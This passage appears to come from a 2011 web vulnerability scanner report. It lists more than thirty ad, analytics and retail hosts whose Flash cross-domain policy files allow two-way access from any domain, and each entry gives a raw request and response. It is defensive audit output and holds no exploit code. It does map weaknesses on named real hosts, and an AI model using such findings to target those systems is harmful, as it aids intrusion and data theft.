You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://9d060c.r.axf8.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://9d060c.r.axf8.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 9d060c.r.axf8.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 20 Jul 2010 09:32:23 GMT
Accept-Ranges: bytes
ETag: "56b3a475ee27cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:53:22 GMT
Connection: close
Content-Length: 153

<?xml version="1.0"?>
<!-- http://www.adobe.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.2. http://a.netmng.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.netmng.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:04 GMT
Server: Apache/2.2.9
Last-Modified: Fri, 07 May 2010 14:42:29 GMT
ETag: "6c1d1-6a-4860211879f40"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.3. http://a.rfihub.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.rfihub.com

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 199

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.4. http://a.tribalfusion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.5. http://action.mathtag.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://action.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: action.mathtag.com

Response

HTTP/1.1 200 OK
Set-Cookie: uuid=b8c3cf57-3d33-43ae-957f-69f246813443; path=/; expires=Thu, 15-May-2014 01:55:06 GMT; domain=.mathtag.com
Content-Type: text/xml
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 215
Date: Mon, 16 May 2011 01:55:06 GMT
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

6.6. http://action.media6degrees.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://action.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: action.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Mon, 16 May 2011 01:55:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.7. http://ad.afy11.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 02:01:33 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.8. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Mon, 16 May 2011 01:53:56 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.9. http://ads.traderonline.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.traderonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.traderonline.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Fri, 10 Jul 2009 20:11:18 GMT
ETag: "c6acd-d0-46e5f933c6580"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3a45525d5f4f58455e445a4a423660;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

6.10. http://ads.undertone.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 08 Apr 2011 22:43:44 GMT
ETag: "4cd8005-fc-4a06ff54b2800"
Accept-Ranges: bytes
Content-Length: 252
Content-Type: text/xml
Date: Mon, 16 May 2011 02:00:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.undertone.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.11. http://adserver.veruta.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.veruta.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adserver.veruta.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 16 May 2011 01:58:38 GMT
Content-Type: text/xml
Content-Length: 211
Last-Modified: Sat, 24 Oct 2009 00:35:22 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-doma
...[SNIP]...

6.12. http://altfarm.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Mon, 16 May 2011 02:00:28 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.13. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 17 May 2011 01:55:23 GMT
Date: Mon, 16 May 2011 01:55:23 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.14. http://beacon.afy11.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.afy11.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: beacon.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:36:36 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.15. http://bp.specificclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bp.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Mon, 16 May 2011 01:54:10 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

6.16. http://bs.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 16 May 2011 01:57:38 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>
6.17. http://cebwa.122.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cebwa.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cebwa.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:08 GMT
Server: Omniture DC/2.0.0
xserver: www379
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.18. http://cimg-1.restorationhardware.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cimg-1.restorationhardware.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cimg-1.restorationhardware.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:22 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "24406b-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=985
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.19. http://customerappreciation.petco.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://customerappreciation.petco.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: customerappreciation.petco.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:24 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "a6de0-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=900
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.20. http://d.xp1.ru4.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:58:24 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:05 GMT
Content-length: 202
Etag: "ca-4ceae155"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.21. http://data.coremetrics.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.coremetrics.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: data.coremetrics.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:52 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "21c4c0-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=851
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.22. http://dis.us.criteo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://dis.us.criteo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dis.us.criteo.com

Response

HTTP/1.1 200 OK
Server: nginx
Cache-Control: max-age=31104000
Cache-Control: public
Content-Type: text/xml
Date: Mon, 16 May 2011 01:58:00 GMT
Expires: Thu, 10 May 2012 01:58:00 GMT
Accept-Ranges: bytes
Connection: close
Last-Modified: Wed, 19 Sep 2007 08:50:25 GMT
Content-Length: 360

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

6.23. http://fls.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

allow-access-from domain="*" with secure="false": any origin's SWF, including one loaded over plain HTTP where this file is also served over HTTPS, gets two-way access to this host. The embedded comment identifies the file as the policy for www.doubleclick.net; it is served with the recommended Content-Type text/x-cross-domain-policy, and the capture is truncated before the site-control element, so the meta-policy setting is not visible.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 15 May 2011 02:39:40 GMT
Expires: Sat, 30 Apr 2011 02:36:16 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 83614
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.24. http://gsicace.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsicace.112.2o7.net
Path:   /crossdomain.xml

Issue detail

Omniture data-collection template (Server: Omniture DC/2.0.0): allow-access-from domain="*" secure="false" together with allow-http-request-headers-from domain="*" headers="*", so a SWF from any origin may not only read responses but also attach arbitrary request headers. The file is served as text/html, which Flash Player still accepts for a master policy (any text/* type is honoured). Because the policy is the vendor's, remediation lies with the analytics provider rather than with the site that embeds the tracker.

Request

GET /crossdomain.xml HTTP/1.0
Host: gsicace.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:57:11 GMT
Server: Omniture DC/2.0.0
xserver: www398
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.25. http://hire.jobvite.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /crossdomain.xml

Issue detail

allow-access-from domain="*": any origin gets two-way access. Unlike the ad and analytics hosts that make up most of this section, a recruiting application host can serve applicant or recruiter session content, so the generic risk statement applies with full force here. The bytes rendered as "..." ahead of the XML declaration are most likely a byte-order mark; they do not change the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: hire.jobvite.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 20 Jul 2010 18:27:10 GMT
Accept-Ranges: bytes
ETag: "093692a3928cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:22:20 GMT
Connection: close
Content-Length: 108

...<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.26. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

site-control permitted-cross-domain-policies="master-only" correctly confines policy loading to /crossdomain.xml, but the master policy itself contains allow-access-from domain="*", so every origin still gets two-way access. Note that merely fetching the policy sets a session cookie on .adnxs.com.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 02:01:44 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.27. http://idcs.interclick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

allow-access-from domain="*": two-way access for any origin. The capture is truncated after that element, so any site-control setting or further entries are not visible; the bytes shown as "..." before the XML declaration are most likely a byte-order mark.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Accept-Ranges: bytes
ETag: "7b643f1dafecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 16 May 2011 02:01:01 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.28. http://marketlive.122.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://marketlive.122.2o7.net
Path:   /crossdomain.xml

Issue detail

Same Omniture template as the other 2o7.net and metrics.* hosts in this section: allow-access-from domain="*" secure="false" together with allow-http-request-headers-from domain="*" headers="*". Any origin may read responses and send arbitrary request headers; the fix belongs with the analytics vendor.

Request

GET /crossdomain.xml HTTP/1.0
Host: marketlive.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:42 GMT
Server: Omniture DC/2.0.0
xserver: www398
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.29. http://mbox12.offermatica.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://mbox12.offermatica.com
Path:   /crossdomain.xml

Issue detail

allow-access-from domain="*" with no site-control element: any origin gets two-way access to this Test &amp; Target host. The secure attribute is omitted, so it defaults to true.

Request

GET /crossdomain.xml HTTP/1.0
Host: mbox12.offermatica.com

Response

HTTP/1.1 200 OK
ETag: W/"201-1304618936000"
Accept-Ranges: bytes
Content-Length: 201
Date: Mon, 16 May 2011 01:53:41 GMT
Connection: close
Last-Modified: Thu, 05 May 2011 18:08:56 GMT
Server: Test & Target
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

6.30. http://media.fastclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /crossdomain.xml

Issue detail

allow-access-from domain="*": two-way access for any origin, with no site-control restriction visible in the capture.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.fastclick.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:30 GMT
Server: Apache/2.2.4 (Unix)
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 202
Keep-Alive: timeout=5, max=19993
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.31. http://media.gnc.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.gnc.com
Path:   /crossdomain.xml

Issue detail

allow-access-from domain="*": two-way access for any origin. The file is the same one served by media.gsimedia.net in the next entry (identical ETag "c9-41641cd0", identical Last-Modified of 06 Oct 2004 and identical P3P policy), so the two hostnames share one policy and one fix.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:34 GMT
Server: Apache/1.3.37 (Unix)
P3P: policyref="http://media.gnc.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Cache-Control: public, max-age=18000
Expires: Mon, 16 May 2011 06:58:34 GMT
Last-Modified: Wed, 06 Oct 2004 16:26:56 GMT
ETag: "c9-41641cd0"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.32. http://media.gsimedia.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.gsimedia.net
Path:   /crossdomain.xml

Issue detail

allow-access-from domain="*": two-way access for any origin. This is the same file served by media.gnc.com in the previous entry (identical ETag and Last-Modified), evidently a shared media tier; correcting it once covers both hostnames.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.gsimedia.net

Response

